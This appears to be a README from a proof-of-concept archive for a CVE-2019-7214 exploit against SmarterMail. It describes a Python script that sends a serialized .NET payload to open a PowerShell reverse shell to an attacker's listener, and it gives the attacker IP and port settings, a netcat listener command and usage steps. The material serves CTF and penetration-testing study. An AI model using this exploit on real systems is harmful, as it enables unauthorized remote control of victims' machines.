来源

关联漏洞

描述

For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)

介绍

# Windows Reverse Shell Exploit (PowerShell over TCP)

This Python script targets a vulnerable service running on a remote Windows machine. It sends a serialized .NET payload that launches a PowerShell-based reverse shell back to the attacker's machine.

# CVE-2019-7214

Remote Code Execution in .NET deserialization for the SmarterMail system.

---

## ⚙️ Configuration

Update the script’s configuration section to match your environment:

```python
HOSTNAME = 'hostname'       # Target hostname (resolved via /etc/hosts)
PORT = 9999                 # Target port listening for serialized input
LHOST = '192.168.45.185'    # Attacker IP (listener)
LPORT = 4444                # Attacker listening port
```

---

## 🧪 What It Does

- Resolves the target's hostname to an IP address.
- Constructs a PowerShell reverse shell command.
- Base64-encodes the command in UTF-16LE format.
- Appends it to a pre-built serialized .NET payload blob.
- Sends the payload over a TCP connection to the target.

---

## 🛠 Requirements

- Python 3.x
- Netcat or a similar tool listening on the attacker's port:
  ```bash
  nc -lvnp 4444
  ```

---

## 🚀 Usage

```bash
python3 CVE-2019-7214 .py
```

If successful, you'll get a PowerShell prompt from the target on your listener.

---

## 🧼 Notes

- Make sure the target accepts serialized .NET input over the specified port.
- This script assumes the target can execute deserialized objects containing `System.Management.Automation` functionality.
- Be careful with spacing, encoding, and payload size – the PowerShell command is padded to exactly 1360 bytes to avoid corruption.

---

## ⚠️ Disclaimer

This script is provided for **educational purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

文件快照

 [4.0K]  /data/pocs/a414032aaa851f72389667fcf59e3f6000c82ca6
├── [3.5K]  CVE-2019-7214.py
└── [1.8K]  README.md

0 directories, 2 files

备注